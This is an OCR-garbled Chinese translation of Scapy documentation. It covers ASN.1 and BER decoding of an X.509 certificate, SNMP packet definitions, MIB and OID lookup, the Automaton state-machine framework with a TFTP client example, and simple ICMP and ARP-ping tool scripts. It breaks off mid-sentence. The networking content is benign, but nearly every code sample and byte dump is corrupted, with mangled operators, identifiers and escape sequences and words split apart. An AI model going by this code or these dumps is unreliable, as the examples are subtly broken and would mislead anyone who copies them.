N\x010\xbe\n\xb6\x03\xd3\xad\x8aE\xf7\xda\ ' M) Nxb1HNxdf NxeANX11NXx 
e4\x96F\xbd1\x02>\xd6Q\xc8\x95\x17\xO1\x15\xa9\xf2\xaa\xaa\xf2\x 
bf/eNx1boNxdONxb9Nx1aNx93NXxf 5NX8e5NXCANX80NX872NX94/fNxeANxe9Nxa 
8\xf FA\x9cp*0*9\x18\x95\x1e~\xfba\x01<Q\x08. (\x18\xa4\x16\x0OF1\x 
fd: 1#\x93 v\xe1\xfd\x07\x85\xd1[?\xd2\x1ics2\xdd\xfa\xb9\xf8\x8c\ 
xcf\x02\x87Z\x9a\x96\xe4\xedO\x89\x8dSC\xab\x0e\x13\xcO\x01\x15\ 
xb4y8\xdb\xfcn=\x9eQ\ xb6\xb8\x13\x8bg\xcf\xf9 | \xd9"\x1id\xf6]\xc5 
\xic\x01/\x98\xe8Z$\x18\xbc\x84\xd7\xfa\xdcr[\xf7\xci:h' 


Context 类 必须 被 指定 : 


>>> (dcert,remain) = BERcodec Object.dec(cert, context=ASN1 Clas 
s X509) 

>>> dcert.show() 
# ASN1 SEQUENCE: 

# ASN1 SEQUENCE: 

# ASN1 X509 CONTO: 
<ASN1_INTEGER[2L]> 
<ASN1_INTEGER[1L]> 

# ASN1_ SEQUENCE: 

<ASN1 0OID['.1.2.840.113549.1.1.5']» 
<ASN1 NULL [0L]» 

# ASN1 SEQUENCE: 

# ASN1 SET: 

# ASN1 SEQUENCE: 

<ASN1 OID['.2.5.4.6']» 

«ASN1 PRINTABLE STRING['US']» 

# ASN1 SET: 

# ASN1 SEQUENCE: 

«ASN1 OID['.2.5.4.10' ]» 

«ASN1 PRINTABLE STRING['AOL Time Warner Inc.']» 
# ASN1 SET: 

# ASN1 SEQUENCE: 


<ASN1_OID['.2.5.4.11']> 
<ASN1_PRINTABLE_STRING['America Online Inc.']|> 

# ASN1_SET: 

# ASN1 SEQUENCE: 

<ASN1 OID['.2.5.4.3']» 

<ASN1_ PRINTABLE STRING['AOL Time Warner Root Certification Auth 
ority 2']» 

# ASN1 SEQUENCE: 

«ASN1 UTC TIME['020529060000Z2']» 

«ASN1 UTC TIME['370928234300Z2' |> 

# ASN1 SEQUENCE: 

# ASN1 SET: 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.4.6']> 

«ASN1 PRINTABLE STRING['US']» 

# ASN1 SET: 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.4.10']> 

«ASN1 PRINTABLE STRING['AOL Time Warner Inc.']» 

# ASN1 SET: 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.4.11']> 

<ASN1_PRINTABLE_STRING['America Online Inc. ']|> 

# ASN1_SET: 

# ASN1 SEQUENCE: 

<ASN1 OID['.2.5.4.3']» 

<ASN1_ PRINTABLE STRING['AOL Time Warner Root Certification Auth 
ority 2']» 

# ASN1 SEQUENCE: 

# ASN1 SEQUENCE: 

<ASN1 0OID['.1.2.840.113549.1.1.1']» 

<ASN1 NULL [0L]» 

«ASN1 BIT STRING['Nx000Nx82Nx02NnNx02NX82Nx02Nx01Nx00Nxb47ZNx08 
\x16\x99\x14\xe8U\xb1i\x1b$k\xfco\xc7\x8b\xe6\x87\xa9\x89\xee\x8b\ 
x99NxcdOQNx86Nxa4ANxbeMNxc9Nxd9NxbidNxdc«MNrNX85LNX151FNX8bRXNX9fN 
xf8zNxfdgNxf5$:h]NxdONxf 7daAT\xa3\x8b\xa5\x08\xd2) [Nx9b 0&\x83\x 
dic\x12VIv\xa4\x16\xc2\xa5\x9dE\xac\x8b\x84\x95\xa8\x16\xbi\xec\ 
x9F\xea$\xia\xef\xb9Ow\\\x9a$!,M\xOeq\xif\xa6\xac ]Et\x03\x98\xc4T 
\x8C\x16 JAW\x86\x95u\xOcG\xO1LF ^" NxfcNx15Nxf1Nx0f NxeaNXf BNX14XNXC7 
NXxO0eNxd7nNx81Nx1c^Nxbf ^Nxe7 : *\xd8\x97\x170 | Xx90NxadNx08Nx9d3Nxaf 
\xb8\x99a\x8O\x8b\xa8\x95~\x14\xdce\x121\xa4\xd0\xd8\xef@I\x026\x 
f9nNxa9Nxd6Nx1dNx96VNx04ANxb2Nxb3 -NX16VNx86Nx8f Nxd9. W\x80\xcdg\x1 
Om\xbOL\xfO\xdaF\xb6\xea%. F\xaf\x8d\xb0\x8584\x8b\x148&\x82+\xac\ 
xae\x99\xOb\x8e\x14\xd7R\xbd\x9ei\xc3\x86\x02\x0b\xeavui\t\xce3\ 
X19 !\x85C\xe6\x89 -\x9F%7g\xF1#j Nxd2Nx00mNx97NXxf 9Nx9f Nxe7)NxcaNxd 
dNx1fNxd7Nx06NxeaNxb8Nxc9Nxb9Nt ! \x9F\xc8?\x06\xc5\xd2\xe9\x12F\x 
OON{\x08\xebB=+Hn\x9dg\xddK\x02\xe4D\xFf3\x93\x19\xa5\ '\xceiz\xbe 
g\xd3\xfcP\xa4, \xab\xc3k\xb9\xe3\x80L\xcf\x05ak+\xdc\x1b\xb9\xa6 
\xd2\xd0\xaa\xf5+s\xfo\xce\x905\x9F\XOCR\X1IC\XbF\\ ! a\x14[\x15K\x 
a9$Q\xfc\xa4\\\xF7\x17\x9d\xb0\xd2\xfa\x07\xe9\x8FV\xe4\xla\x8ch 
\x8a\x04\xd3|Z\xe3\x9e\xa2\xa1\xcaq[ \xa2\xd4\xa0\xe7 )\x85]\x03h* 
O\xd2\x06\xd7=\xf9\xc3\x03/?7e\xf 9g\xLeG@\xd3c\xOF\xe3\xd5\x8e\ xf 
9O\x85\xab\x97L\xb3\xd7&\ xeb\ x96\N\x94\xde\x856\x9C\xc8\X7F\x84\t 


\x021*\xOe\xf5d2\x0c\x82\xd1\xbaj\x82\x1b\xb3Kt\x11\xf3\x8cw\xd6 
\x9f\xbf\xdc7\xa4\xa7U\x04/\xd41\xe8\xd3F\xb9\x03 | \xda\x12NYd\xb 
7Q11PNxaONxcaNx1cN !' Nxd9Nx10. NxadNxd6NxbdNx10f *Nxc3Nxb0" JNAx12[NXx0 
2\x03\x01\x00\x01' ]> 

# ASN1_X509_CONTS: 

# ASN1 SEQUENCE: 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.29.19']> 

<ASN1_BOOLEAN[ -1L]> 

«ASN1 STRING['ONXx03Nx01Nx01Nxff ' ] > 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.29.14']> 

<ASN1_STRING[ '\x04\x140im\x03~\x9d\x9F\xX07\x18C\xbc\xb7\x1ON\xd 
5\xbf\xa9\xc4 (']> 

# ASN1 SEQUENCE: 

<ASN1_OID['.2.5.29.35']> 

«ASN1 STRING['ONx16Nx80Nx140imNx03-Nx9dNx9f NX07NX18CNxbcNxb7Nx1 
ON\xd5\xbf\xa9\xc4 (']> 

# ASN1_ SEQUENCE: 

<ASN1_OID['.2.5.29.15']> 

<ASN1_BOOLEAN[ -1L]> 

<ASN1_STRING[ '\x03\x02\x01\x86' ' ] > 

# ASN1 SEQUENCE: 

<ASN1 OID['.1.2.840.113549.1.1.5']» 

«ASN1, NULL [0L ]» 
<ASN1_BIT_STRING[ '\x00; \xf3\xae\xca\xe8.\x87\x85\xfbeY\xe7\xad\ 
X11\x14\xa5W\ xbcxX\ x9F$\x1L2W\xbb\xfb?4\xda\xee\xadz*4rp1k\xc7\x19 
\x98\x80\xc9\x82\xde7wAT\x8b\x8e\xf2\xeagO\xc9t\x84\x91V\t\xd5\x 
e5zNx9aNx81Nxb6Nx81Nxc2Nxad6NxeANXTATNX11SNXxf 3AENXO1&NXC8NXe5NX1 
a\xbc4D! \xde\xad%\xfcv\x16w! \x90\x80\x98W\x9dN\xea\xec/\xaa<\x14 
{W\xc1~\x18\x14g\xee$\xc6\xbd\xba\x15\xbO\xd2\x18\xbd\xb7U\x81\x 
acS\xc0\xe8\xddi\x12\x13B\xb7\x02\xb5\xO05A\xcayPn\x82\x0eqr\x93F 
\xe8\x9d\r ]\xbd\xae\xce) \xadc\xd5U\x16\x800\ '\xffv\xba\xf7\xb8\x 
d6J\xe3\xd9\xb5\xf9R\xdON@\xa9\xc7\xe5\xc22\xc7\xaav$\xelk\xO5P\ 
xeb\xc5\xbf\nT\xe5\xb9B<$\xfb\xb7\x07\x9cO\x9F yZ\xe6\xeO@R\xX15\x 
fANxfcNxaaNxf AVAXf 9DNX97NXx87NxedNxOeer^Nxbe&Nxf bMNxaA -\x08\x07\x 
de\xd8\\\xa0\xdc\x813\x99\x18%\x11w\xa7\xeb\xfdX\t, NX99kNx1bNx8a 
NXf 3R?NX1aMH “\xf1\xaO\xf63\xO2S\x8b\xed%\t\xb8\r -\xed\x97s\xec\x 
d7\x96\x1f\x8e " NxOeNxdaNx10Nx9b/NXx18$Nxf 6Nxa6MNnNxf9; \xcbu\xc2\x 
cc/\xce$i\xc9\n"\x8eY\xa7\xf7\x82\x0C\xd7\xd7k5\x9cC\x00j \xc4\x9 
5g\xba\x9cE\xcb\xb8\x0e7\xf7\xdcN\x010\xbe\n\xb6\x03\xd3\xad\x8a 
E\xf7\xda\'M)\xbiH\xdf\xe4\x11\xe4\x96F\xbd1\x02>\xd6Q\xc8\x95\x 
17\x01\x15\xa9\xf2\xaa\xaa\xf2\xbf /eNx1boNxdONxb9Nx1aNx93NXf 5NXx8 
e5\xc4\x80\x87>\x94/F\xe4\xe9\xa8\xf fANx9cp*O*9Nx18Nx95Nx1e-Nxfb 
a\x01<Q\x08. (NX18Nxa4ANX16NxOf 1Nxfd: 142Nx93. vNxedNxfadNx07Nx85Nxd1[ 
?Nxd2Nx1cs2NxddNxfaNxb9Nxf 8NXx8CNXCfNX02NX87ZNx9aNXx96NxeANxedONx8 
9\x8dSC\xab\xO0e\x13\xcO\x01\x15\xb4y8\xdb\xfcn=\x9eQ\ xb6\xb8\x13 
\x8bg\xcf\xf9 | \xd9"\x1id\xf6]\xc5\x1ic\x01/\x98\xe8z$\x18\xbc\x84\ 
xd7\xfa\xdcr [\xf7\xci:h' ]» 


ASN.1 XL É 


虽然 这 可 能 不 错 ， 但 是 只 是 ASN.1 的 一 个 编 解 码 器 ， 和 Scapy 没 有 什么 关系 。 


ASN.1 字 段 


Scapy 提 供 ASN.1 字 段 ， 它 们 封装 了 ASN.1 对 象 并 提供 了 必要 的 逻辑 绑 定 对 象 名 到 
值 。ASN.1 数 据 包 将 会 被 解析 成 一 哥 ASN.1 字 段 树 ， 然 后 在 同一 个 层面 上 每 一 个 字 
段 名 将 会 做 成 一 个 正常 的 2 a (比如 说 :为 了 访问 SNMP 数 据 包 的 版 本 字 
段 ， 你 不 用 知道 它 包 装 了 多 少 层 容器 ) 。 


每 一 个 ASN.1 字 段 都 会 通过 它 的 标签 连接 到 ASN.1 对 象 。 


ASN.1 数 据 包 


ASN.1 数 据 包 继 承 自 Packet 类 。 而 不 是 一 个 fields desc 序列 的 字段 ， 它 们 定 
SLY ASN1_ codec 和 ASN1_root 属性 。 第 一 个 是 一 个 编 解 码 器 (比如 
说 : ASN1 Codecs.BER )， 第 二 个 是 一 个 ASN.1 字 段 的 组 合 树 。 


一 个 完整 的 例子 : SNMP 
SNMP 定 义 了 新 的 ASN.1 对 象 ， 我 们 需要 定义 它们 : 


class ASN1 Class SNMP(ASN1 Class UNIVERSAL): 
name="SNMP" 
PDU GET = Oxa0 
PDU NEXT = Oxal 
PDU RESPONSE = 0xa2 
PDU_SET = Oxa3 
PDU TRAPv1 = 0xa4 
PDU BULK = 0xa5 
PDU INFORM = Oxa6 
PDU TRAPv2 = 0xa? 


这 个 对 象 是 PDU， 实 际 上 是 一 个 序列 容器 的 新 名 称 ^ (这 通常 是 在 context WHE 
的 情况 下 : 他 们 F ae 容器 有 了 新 的 名 称 ) ， 这 意味 着 创建 一 个 相应 的 ASN.1 对 
象 和 BER 编 解码 器 是 4 容易 的 : 


class ASN1 SNMP PDU GET(ASN1 SEQUENCE): 
tag = ASN1 Class SNMP.PDU GET 


class ASN1 SNMP PDU NEXT(ASN1 SEQUENCE): 
tag = ASN1 Class SNMP.PDU NEXT 


# [...] 


class BERcodec SNMP PDU GET(BERcodec SEQUENCE): 
tag - ASN1 Class SNMP.PDU GET 


class BERcodec SNMP PDU NEXT(BERcodec SEQUENCE): 
tag = ASN1 Class SNMP.PDU NEXT 


mop] 
元 类 提供 的 魔法 基于 一 切 都 是 自动 注册 和 ASN.1 对 象 和 BER 编 解码 器 都 能 找到 对 方 
的 事实 。 
ASN.1 的 字段 也 是 不 重要 的 : 


class ASN1F_SNMP_PDU_GET(ASN1F_SEQUENCE ) : 
ASN1_tag = ASN1 Class SNMP.PDU GET 


class ASNAF SNMP PDU NEXT(ASN1F SEQUENCE): 
ASN1 tag = ASN1 Class SNMP.PDU NEXT 


8 [...] 


现在 ， 困 难 的 部 分 ，ASN.1 数 据 包 : 


SNMP error = ( 0: "no error", 
JT “Tool bag: 


} 


SNMP_trap_types = { 0: "cold_start", 
1: "warm Start", 


# [...] 


# [...] 
j 


class SNMPvarbind(ASN1 Packet): 
ASN1 codec = ASN1_Codecs.BER 
ASN1 root = ASN1F SEQUENCE( ASN1F_OID("oid","1.3"), 
ASN1F_field("value",ASN1_NULL(0) 


) 


class SNMPget(ASN1 Packet): 


ASN1 codec = ASN1_Codecs.BER 
ASN1 root = ASN1F SNMP PDU GET( ASN1F_INTEGER("id",®), 
ASN1F enum INTEGER("error",0O 
, SNMP error), 
ASNiF_INTEGER("error_index", 0 


); 


st", [], SNMPvarbind) 


ASN1F. SEQUENCE OF("varbindli 


) 


class SNMPnext(ASN1 Packet): 
ASN1 codec = ASN1_Codecs.BER 
ASN1 root = ASN1F SNMP PDU NEXT( ASN1F_INTEGER("id",0), 
ASN1F enum INTEGER("error",0 
, SNMP error), 
ASNA1F INTEGER("error index", 
9), 
ASN1F SEQUENCE OF('varbindl 


) 


ist", [], SNMPvarbind) 


8 [...] 


class SNMP(ASN1 Packet): 
ASN1 codec = ASN1_Codecs.BER 
ASN1 root = ASN1F_SEQUENCE ( 
ASN1F enum INTEGER("version", 1, {O:"vi", 1:"v2c", 2:"v2" 
, 3:"v3"}), 
ASN1F STRING("community","public"), 
ASN1F_CHOICE( "PDU", SNMPget(), 
SNMPget, SNMPnext, SNMPresponse, SNMPset, 
SNMPtrapvi, SNMPbulk, SNMPinform, SNMPtrapv 


2) 
) 
def answers(self, other): 
return ( isinstance(self.PDU, SNMPresponse) and 
( isinstance(other.PDU, SNMPget) or 
isinstance(other.PDU, SNMPnext) or 
isinstance(other.PDU, SNMPset) ) and 
self.PDU.id -- other.PDU.id ) 
SIT 
bind layers( UDP, SNMP, Sport=161 ) 


bind layers( UDP, SNMP, dport=161 ) 
Sa 
这 些 不 会 有 太 大 的 困难 ， 如 果 你 认为 不 可 能 有 这 么 短 就 能 实现 一 个 SNMP 编 解码 
器 ， 我 可 能 会 删 减 很 多 ， 请 看 看 完整 的 源 代 码 。 


现在 ， 如 何 使 用 它 ? 通常 : 


>>> a=SNMP(version=3, PDU-SNMPget(varbindlist-[SNMPvarbind(oid-" 
1.2.3",value=5), 

ae SNMPvarbind(oid=" 
3.2.1", value="hello")])) 

>>> a.show() 
###[ SNMP ]### 

version= v3 

community- 'public' 


\PDU\ 
|###[ SNMPget ]### 
| id= 0 


| error- no error 
| error index- 0 
| \varbindlist\ 
| |###[ SNMPvarbind ]### 
| | oid= '1.2.3' 
| | value= 5 
| |###[ SNMPvarbind ]### 
| | sodd-- 3.2.1 
| | value- 'hello' 
>>> hexdump(a) 
0000 30 2E 02 01 03 04 06 70 75 62 6C 69 63 AO 21 02 0 
.public.!. 
0010 01 00 02 01 00 02 01 O0 30 16 30 07 06 02 2A 03 


L EAS stor 
0020 02 01 05 30 OB O6 02 7A 01 04 05 68 65 6C 6C 6F Seco aee 
.Z...hello 


>>> send(IP(dstz"1.2.3.4")/UDP()/SNMP( )) 


Sent 1 packets. 
>>> SNMP(str(a)).show() 
###[ SNMP ]### 
version- <ASN1_INTEGER[3L ]> 
community- <ASN1_STRING[ 'public' ]> 
\PDU\ 
|###[ SNMPget ]### 
| id= <ASN1_INTEGER[OL ]> 
| error- <ASN1_INTEGER[OL]> 
| error index- <ASN1_INTEGER[OL]> 
| \varbindlist\ 
| |###[ SNMPvarbind ]### 
| | oid= <ASN1 OID['.1.2.3']> 
| | value= <ASN1 INTEGER[5L]> 
| |###[ SNMPvarbind ]### 
| | oid= <ASN1 _OID['.3.2.1']> 
| | value= <ASN1_ STRING['hello']» 


从 MIB 解 析 OID 


X TOD et Z 


OID 对 象 是 通过 ASN1 OID 类 产生 的 : 


>>> 01=ASN1_OID("2.5.29.10") 

>>> 02=ASN1_OID("1.2.840.113549.1.1.1") 

>>> 01,02 

(<ASN1_OID['.2.5.29.10']>, <ASN1_OID['.1.2.840.113549.1.1.1']>) 


加 载 一 个 MIB 
Scapy 可 以 解析 MIB 文 件 并 注意 到 OID 和 它 的 名 称 之 间 的 映射 。 


>>> load mib("mib/*") 
>>> 01,02 
(<ASN1_OID['basicConstraints']>, <ASN1_OID['rsaEncryption' ]>) 


Scapy 4) MIB 24% Jë 


所 有 的 MIB 信 息 都 被 存储 在 cong.mib 对 象 中 ， 这 些 对 象 用 来 寻找 一 个 OID 的 名 
称 。 


>>> conf.mib.shai with rsa signature 
'1.2.840.113549.1.1.5' 


或 者 解析 一 个 OID : 


>>> conf.mib. oidname("1.2.3.6.1.4.1.5") 
'enterprises.5' 


甚至 可 以 图 形 化 表示 它 : 


>>> conf.mib. make graph() 


自动 机 


Scapy 能 够 创建 一 个 简单 的 网 络 自 动机 。Scapy 不 会 拘泥 于 一 个 特定 的 模型 ， 像 是 
Moore 和 Mealy 自 动机 。 它 为 你 提供 了 灵活 的 方法 去 选择 你 想 要 的 。 


Scapy 中 的 自动 机 是 确定 性 的 。 他 有 不 同 的 状态 ， 一 个 开始 状态 和 一 些 结束 ， 错 误 
状态 ， 他 们 从 一 种 状态 过 渡 到 另 一 种 状态 。 过 渡 可 以 在 一 种 特殊 的 状态 下 过 渡 ， 在 
一 个 特定 的 数据 包 或 者 超时 过 渡 。 当 一 个 过 渡 被 接受 了 ， 一 个 或 者 多 个 动作 将 会 运 


行 ， 一 个 动作 可 以 被 绑 定 在 多 个 过 渡 中 。 参 数 可 以 通过 从 状态 到 过 渡 和 从 过 渡 到 状 
态 和 动作 中 传递 。 


i E 度 看 ， 状 态 ， 过 渡 和 动作 都 是 来 自 自动 机 子 类 的 方法 。 他 们 都 被 
装 起 来 提供 元 信息 以 供 自动 机 工作 。 


第 一 个 例子 


让 我 们 开始 一 个 简单 的 例子 。 我 按照 惯例 用 字幕 大 写 编写 状态 ， 但 是 每 一 个 有 效 的 
Python 语法 都 会 工作 的 很 好 。 


class HelloWorld(Automaton): 
QATMT.state(initial-1) 
def BEGIN(self): 
print "State=BEGIN" 


QATMT.condition(BEGIN) 

def wait for nothing(self): 
print “Wait for nothing...” 
raise self .END() 


QATMT.action(wait for nothing) 
def on nothing(self): 
print "Action on 'nothing' condition" 


QATMT.state(final-1) 
def END(self): 
print "State=END" 


在 这 个 例子 中 ， 我 们 可 以 看 到 三 个 装饰 器 : 

ATMT.state 被 用 来 表示 一 个 方法 就 是 一 个 状态 ， 并 且 能 用 initial , final 

和 error 可 选 参 数 来 设置 非 零 的 特殊 状态 。 

ATMT.condition 用 来 表示 一 个 方法 ， 当 自动 机 的 状态 到 达 指 示 的 状态 时 将 会 运 
行 。 参 数 是 代表 这 个 状态 的 函数 的 名 称 。 

ATMT.action 绑 定 到 一 个 过 渡 的 方法 ， 当 一 个 过 渡 被 接受 了 该 函数 就 会 运行 。 


运行 这 个 例子 将 会 得 到 下 面 这 个 结果 : 


>>> a-HelloWorld() 

>>> a.run() 

State=BEGIN 

Wait for nothing... 

Action on 'nothing' condition 
State-END 


这 个 简单 的 自动 机 可 以 用 下 面 的 这 个 图 描述 : 






it for nothing 
»[on nothing] 


这 个 图 可 以 用 下 面 的 代码 自动 画 出 : 


>>> Helloworld.graph() 


改变 状态 


ATMT.state 装饰 器 将 方法 转换 成 一 个 返回 一 个 异常 的 函数 。 如 果 你 抛 出 这 个 异 
常 ， 自 动机 的 状态 将 会 被 改变 。 如 果 这 个 改变 发 生 在 一 个 过 渡 中 ， 绑 定 在 这 个 过 渡 
上 的 函数 将 会 被 调用 。 给 定 函 数 的 参数 替换 的 方法 将 被 保留 ， 并 最 终 传递 到 该 方法 
中 。 这 个 异常 有 一 个 方法 action parameters 能 在 抛 出 异常 前 被 调用 ， 他 将 存储 
参数 传递 到 所 有 绑 定 在 当前 过 渡 上 的 动作 。 


作为 一 个 例子 ， 让 我 们 来 考虑 一 下 下 面 的 状态 : 


QATMT.state() 
def MY STATE(self, parami, param2): 

print "state-MY STATE. parami=%r param2=%r" 96 (parami, param 
2) 


这 个 状态 将 会 到 达 下 面 的 代码 : 


QATMT.receive condition(ANOTHER STATE) 
def received ICMP(self, pkt): 
if ICMP in pkt: 
raise self.MY STATE("got icmp", pkt[ICMP].type) 


la 
Sp 


让 我 们 假设 我 们 想 绑 定 一 个 动作 到 这 个 状态 ， 这 也 将 需要 一 


QATMT.action(received ICMP) 
def on ICMP(self, icmp type, icmp code): 
self.retaliate(icmp type, icmp code) 


这 个 条 件 应 该 被 满足 : 


QATMT.receive condition(ANOTHER STATE) 
def received ICMP(self, pkt): 
if ICMP in pkt: 
raise self.MY STATE("got icmp", pkt[ICMP].type).action p 


arameters(pkt[ICMP].type, pkt[ICMP].code) 
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receive data 
>[send_ack] 






receive error 





class TFTP read(Automaton): 
def parse args(self, filename, server, sport - None, port-69 
p o kangsi: 
Automaton.parse args(self, **kargs) 
self.filename - filename 
self.server - server 
self.port - port 
self.sport - sport 


def master filter(self, pkt): 
return ( IP in pkt and pkt[IP].src -- self.server and UD 
P in pkt 
and pkt[UDP].dport == self.my tid 
and (self.server tid is None or pkt[UDP].sport 
-- self.server tid) ) 


4 BEGIN 
QATMT.state(initial-1) 
def BEGIN(self): 
self.blocksize-512 
self.my tid - self.sport or RandShort(). fix() 
bind bottom up(UDP, TFTP, dport-self.my tid) 


self.server tid - None 
Sel res = vs 


self.13 = IP(dst=self.server)/UDP(sport=self.my_tid, dpo 
rt=self.port)/TFTP() 

self.last_packet = self.13/TFTP_RRQ(filename=self.filena 
me, mode="octet") 

self.send(self.last packet) 

self .awaiting=1 


raise self .WAITING() 


# WAITING 

QATMT.state() 

def WAITING(self): 
pass 


QATMT.receive condition(WAITING) 
def receive data(self, pkt): 
if TFTP DATA in pkt and pkt[TFTP DATA].block -- self.awa 
iting: 
if self.server tid is None: 
self.server tid - pkt[UDP].sport 
self.13[UDP].dport = self.server tid 
raise self.RECEIVING(pkt) 
QATMT.action(receive data) 
def send ack(self): 
self.last packet - self.13 / TFTP ACK(block - self.await 
ing) 
self.send(self.last packet) 


QATMT.receive condition(WAITING, prio=1) 
def receive error(self, pkt): 
if TFTP ERROR in pkt: 
raise self.ERROR(pkt) 


QATMT.timeout(WAITING, 3) 
def timeout waiting(self): 
raise self.WAITING() 
QATMT.action(timeout waiting) 
def retransmit last packet(self): 
self.send(self.last packet) 


4 RECEIVED 
QATMT.state() 
def RECEIVING(self, pkt): 
recvd = pkt[Raw].load 
self.res += recvd 
self.awaiting += 1 
if len(recvd) == self.blocksize: 
raise self .WAITING() 
raise self .END() 








# ERROR 

@ATMT.state(error=1) 

def ERROR(self,pkt): 
split bottom up(UDP, TFTP, dport=self.my_tid) 
return pkt[TFTP ERROR].summary( ) 


ZEND 

QATMT.state(final-1) 

def END(self): 
split bottom up(UDP, TFTP, dport-self.my tid) 
return self.res 


例 : 


` 


他 运行 起 来 像 是 这 样 ， 这 是 


x 


>>> TFTP_read("my_file", "192.168.1.128").run() 


状态 的 装饰 器 


状态 是 被 ATMT. state 元 数 结果 装饰 过 的 方法 。 他 有 三 个 可 选 的 参 


#% > initial , final 和 error ， 当 我 们 设置 为 True 时 ， 就 意味 着 这 个 状态 


是 一 个 initial ， final 或 者 error 状态 。 


class Example(Automaton): 
QATMT.state(initial-1) 
def BEGIN(self): 
pass 


QATMT.state() 
def SOME STATE(self): 
pass 


QATMT.state(final-1) 
def END(self): 
return "Result of the automaton: 42" 


QATMT.state(error-1) 
def ERROR(self): 
return "Partial result, or explanation" 


过 渡 是 被 ATMT.condition , ATMT.receive condition , ATMT.timeout 之 一 
的 函数 结果 装饰 过 的 方法 。 他 们 都 作为 他 们 关联 的 状态 方法 的 参 

dt^ ATMT.timeout 也 有 一 个 强制 性 的 参数 timeout 用 来 提供 超时 的 时 间 秒 

值 。 ATMT.condition 和 ATMT.receive condition 有 一 个 可 选 的 prio 参 

数 ， 因 此 在 这 种 情况 下 的 调用 的 顺序 是 可 以 被 强制 提高 优先 级 的 。 默 认 的 优先 级 是 
0。 相 同 的 优先 级 的 过 渡 调 用 的 顺序 是 不 确定 的 。 


当 自 动机 切换 到 一 个 给 定 的 状态 ， 这 个 状态 的 方法 将 会 被 执行 ， 然 后 过 渡 方 法 将 会 
在 特殊 的 时 刻 被 调用 ， 直 到 触发 一 个 新 的 状态 。 (有 时 候 像 是 抛 

出 self.MY NEW STATE() ) 。 首 先 ， 在 状态 方法 返回 正确 之 

后 ，ATMT.condition 装饰 的 方法 通过 提升 优先 级 运行 ， 然 后 每 一 个 时 刻 通 过 主 

要 的 过 滤器 收 到 和 接受 的 数据 包 所 有 的 ATMT.receive condition 装饰 过 的 方法 
都 会 通过 提升 优先 级 运行 。 当 一 个 超时 的 数据 包 进 入 当前 的 空间 ， 相 应 

的 ATMT.timeout 装饰 过 的 方法 将 会 被 调用 。 


class Example(Automaton): 
QATMT.state() 
def WAITING(self): 
pass 


QATMT.condition(WAITING) 

def it is raining(self): 
if not self.have umbrella: 
raise self.ERROR WET() 





QATMT.receive condition(WAITING, prio=1) 
def it is ICMP(self, pkt): 
if ICMP in pkt: 
raise self.RECEIVED ICMP(pkt) 


QATMT.receive condition(WAITING, prio-2) 
def it is IP(self, pkt): 
if IP in pkt: 
raise self.RECEIVED IP(pkt) 


QATMT.timeout(WAITING, 10.0) 
def waiting timeout(self): 
raise self.ERROR TIMEOUT() 


动作 装饰 器 


动作 是 被 ATMT .action 函数 结果 装饰 过 的 方法 。 这 个 函数 接受 过 渡 方 法 绑 定 他 作 
为 第 一 个 参数 ， 并 且 可 选 的 优先 级 prio 作为 第 二 个 参数 ， 黑 认 的 优先 级 是 0。 一 
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class Example(Automaton): 
QATMT.state(initial-1) 
def BEGIN(self): 
pass 


QATMT.state(final-1) 
def END(self): 
pass 


QATMT.condition(BEGIN, prio=1) 
def maybe go to end(self): 
if random() » 0.5: 
raise self.END() 
QATMT.condition(BEGIN, prio-2) 
def certainly go to end(self): 
raise self.END() 


QATMT.action(maybe go to end) 
def maybe action(self): 

print "We are lucky..." 
QATMT.action(certainly go to end) 
def certainly action(self): 

print "We are not lucky..." 
QATMT.action(maybe go to end, prio-1) 
QATMT.action(certainly go to end, prio-1) 
def always action(self): 

print “This wasn’ t duck...” 


两 种 可 能 的 输出 结果 是 : 


>> a-Example() 

>>> a.run() 

We are not lucky... 
This wasn't luck!... 
>>> a.run() 

We are lucky... 

This wasn't luck!... 


重 载 方法 
两 种 方法 通过 hooks 重 载 : 


parse args() 方法 是 通过 _init () 和 run() 提供 参数 被 调用 的 。 使 用 这 
些 来 确定 你 的 自动 机 的 行为 。 


master filter() 方法 被 每 一 时 刻 嗅 探 到 的 数据 包 所 调用 ， 如 果 自 动机 感 兴 趣 的 
话 。 当 工作 在 一 个 特殊 的 协议 上 时 ， 这 将 确保 这 些 数据 包 属 于 你 连接 到 的 一 部 分 ， 
所 以 你 不 必 在 每 一 个 过 渡 中 做 明确 的 检查 。 


高 级 用 法 
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构建 你 自己 的 工具 


tea oc Sg T. DJ 

来 源 : Python Scapy (2.3.1) 文档 学 习 ( 五 ) : 构建 自己 的 工具 
原文 : Build your own tools 

协议 : CC BY-NC-SA 2.5 


你 可 以 使 用 Scapy 构 建 你 自己 的 自动 化 工具 。 你 也 可 以 扩展 Scapy 而 不 必 编辑 它 的 
源 文 件 。 如 果 你 构建 了 一 些 有 趣 的 工具 ， 请 捐献 给 我 们 的 邮件 列表 。 


在 你 的 工具 中 使 用 Scapy 


你 可 以 很 容易 的 在 你 的 工具 中 使 用 Scapy， 只 需要 导入 你 需要 的 便 可 以 使 用 。 
第 一 个 例子 是 传 入 一 个 IP 或 者 一 个 主机 名 作为 参数 ， 发 送 一 个 ICMP 响 应 请 求 ， 然 
后 显示 返回 包 完 整 的 构造 。 


#! /usr/bin/env python 


import sys 
from scapy.all import sr1,IP, ICMP 


p=sri(IP(dst=sys.argv[i])/ICMP() ) 
if) ps 
p.show() 


找 个 有 一 个 更 加 灵活 的 例子 ， 就 是 生成 一 个 ARP 的 ping 包 ， 并 用 LaTeX 格 式 报告 它 
所 发 现 的 东西 。 


#! /usr/bin/env python 
4 arping2tex : arpings a network and outputs a LaTeX table as a 
result 


import sys 
if len(sys.argv) !- 2: 

print "Usage: arping2tex <net>\n eg: arping2tex 192.168.1.0/ 
24" 

sys.exit(1) 


from scapy.all import srp, Ether, ARP, conf 

conf . verb=0 

ans, unans=srp(Ether(dst="ff: ff: ff: ff: fF: FF" )/ARP(pdst=sys.argv[1 
]), 


timeout=2) 


print r"\begin{tabular}{|1|1|}" 
print or" xhliine" 
print r"MAC & IPNN" 
print r"Nhline' 
for snd,rcv in ans: 
print rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\") 
print r'xhline" 
print r"\end{tabular}" 


这 有 另外 一 个 工具 ， 它 将 时 刻 监控 机 器 上 的 所 有 的 网 卡 并 打印 所 有 的 ARP 请 求 。 即 
